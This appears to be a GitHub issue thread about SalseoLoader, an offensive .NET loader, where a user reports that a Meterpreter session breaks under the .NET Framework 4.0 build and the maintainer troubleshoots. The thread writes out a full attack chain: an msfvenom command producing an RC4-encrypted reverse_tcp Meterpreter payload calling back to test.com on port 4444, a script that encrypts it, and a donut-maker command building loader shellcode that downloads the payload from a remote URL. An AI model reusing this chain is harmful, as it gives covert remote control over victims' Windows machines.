.NET Framework 4.0 SalseoLoader.exe feedback
sunlewuyou opened this issue · comments
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=test.com LPORT=4444 RC4PASSWORD=test -f raw -o test.bin
./encrypterassembly.py "test.bin" "test" test.txt
./donut-maker.py -i SalseoLoader_x64.exe -p test,http://test.com/test.txt,shellcode -o shellcode.txt
Through the above steps, you can get "shell", but "shell" can not work properly, such as "screenshot" will lose "shell", but if you use ".NET Framework 3.5 SalseoLoader_64.exe" will not have this problem.
Demo client host system: win10 x64
You should compile the binaries yourself. Here is a video of how it works. https://www.youtube.com/watch?v=CX_RAxFrxOQ
I compiled it myself, and tested 3.5 and 4.0. 3.5 works, but 4.0 doesn't.
This is more than tested ... However I will check it myself. Can you attach screenshots of the error?
@cybervaca
Is it a problem caused by donut-maker.py not being updated?
Everythings its ok...
Is it 64-bit compiled?
Can be successfully generated using a 32-bit program.
....
can u type "uname -a" and send screenshot?
